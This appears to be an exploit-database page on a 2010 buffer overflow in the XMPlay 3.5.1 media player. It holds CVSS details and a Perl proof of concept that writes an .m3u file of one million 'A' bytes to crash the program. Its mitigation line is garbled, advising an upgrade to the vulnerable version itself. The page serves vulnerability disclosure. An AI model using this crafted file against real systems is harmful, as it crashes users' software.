header-logo
Suggest Exploit
vendor:
Xmyplay
by:
s-dz
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Xmyplay
Affected Version From: 3.5.1
Affected Version To: 3.5.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:un4seen_developments:xmplay
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 (fr)
2010

Xmyplay 3.5.1

Xmyplay 3.5.1 is vulnerable to a buffer overflow vulnerability when a specially crafted .m3u file is opened. This can be exploited to cause a stack-based buffer overflow by corrupting the memory of the application, potentially allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Xmyplay 3.5.1
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Xmyplay 3.5.1 
# Author: s-dz        , s-dz@hotmail.fr
# Download : http://us2.un4seen.com/files/xmplay35.zip
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-07-31

my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x  1000000;

open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");

Navigation

Suggest Exploit

Services By CQR